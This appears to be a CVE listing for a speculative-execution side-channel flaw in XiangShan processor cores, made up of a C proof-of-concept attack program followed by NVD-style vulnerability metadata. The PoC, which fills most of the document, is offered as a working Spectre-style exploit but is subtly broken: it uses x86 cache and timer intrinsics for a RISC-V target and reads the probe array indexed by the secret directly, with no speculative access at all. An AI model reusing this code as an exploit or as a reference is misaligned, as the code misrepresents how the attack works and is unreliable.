CVE-2025-63094

// CVE-2025-63094 PoC - XiangShan Speculative Execution Side-Channel Attack // Based on research from https://github.com/necst/aca25-xiangshan-spectre #include <stdint.h> #include <stdio.h> #include <string.h> #include <x86intrin.h> #define ARRAY_SIZE 256 #define CACHE_HIT_THRESHOLD 80 // Secret data simulation char secret_data[16] = "SECRET_KEY_123"; // Training data for branch predictor char training_array[ARRAY_SIZE * 512]; // Side channel detection array volatile char probe_array[ARRAY_SIZE * 512]; void flush_side_channel() { // Flush probe array from cache for (int i = 0; i < ARRAY_SIZE; i++) { _mm_clflush(&probe_array[i * 512]); } } size_t read_side_channel(size_t malicious_x) { size_t time1, time2; volatile char *addr; // Access probe array based on malicious index addr = &probe_array[malicious_x * 512]; time1 = __rdtsc(); *addr; // Memory access to trigger cache load time2 = __rdtsc(); return time2 - time1; } void attack_sequence() { size_t training_index, malicious_index, result; // Initialize arrays memset((void*)training_array, 0, sizeof(training_array)); memset((void*)probe_array, 0, sizeof(probe_array)); printf("Starting XiangShan Speculative Execution Attack PoC\n"); printf("Target secret: %s\n\n", secret_data); // Attack loop for (int iter = 0; iter < 1000; iter++) { // Flush cache before each attempt flush_side_channel(); // Training phase: manipulate branch predictor for (int i = 0; i < 10; i++) { training_index = i & (ARRAY_SIZE - 1); malicious_index = (secret_data[i % strlen(secret_data)] & 0xFF) % ARRAY_SIZE; // Speculatively read secret data result = read_side_channel(malicious_index); } // Measure timing to detect cached data malicious_index = (secret_data[0] & 0xFF) % ARRAY_SIZE; result = read_side_channel(malicious_index); if (result < CACHE_HIT_THRESHOLD) { printf("Cache HIT detected at index: %zu\n", malicious_index); printf("Potential leaked byte value: %d\n", (int)malicious_index); } } printf("\nAttack completed. Check timing patterns for leaked data.\n"); } int main() { printf("========================================\n"); printf("CVE-2025-63094 PoC - XiangShan Side-Channel\n"); printf("========================================\n"); attack_sequence(); return 0; }

{"cve": {"id": "CVE-2025-63094", "sourceIdentifier": "[email protected]", "published": "2025-12-10T18:16:20.707", "lastModified": "2026-01-02T21:23:35.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XiangShan Nanhu V2 and XiangShan Kunmighu V3 were discovered to use speculative execution and indirect branch prediction, allowing attackers to access sensitive information via side-channel analysis of the data cache."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xiangshan:xiangshan:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "01B90300-4ABC-464F-A54B-BF362E0A7FE3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xiangshan:xiangshan:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "BDF2681F-76EE-4656-B34A-8B1DE9E21F87"}]}]}], "references": [{"url": "https://github.com/necst/aca25-xiangshan-spectre", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/necst/aca25-xiangshan-spectre/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}